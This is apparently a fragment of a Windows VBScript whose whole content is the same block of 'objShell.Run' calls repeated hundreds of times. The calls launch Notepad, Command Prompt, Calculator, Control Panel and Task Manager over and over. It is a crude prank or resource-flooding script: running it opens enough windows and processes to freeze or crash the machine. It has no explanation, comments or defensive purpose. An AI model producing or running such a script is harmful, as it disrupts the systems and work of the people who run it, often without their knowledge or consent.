objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
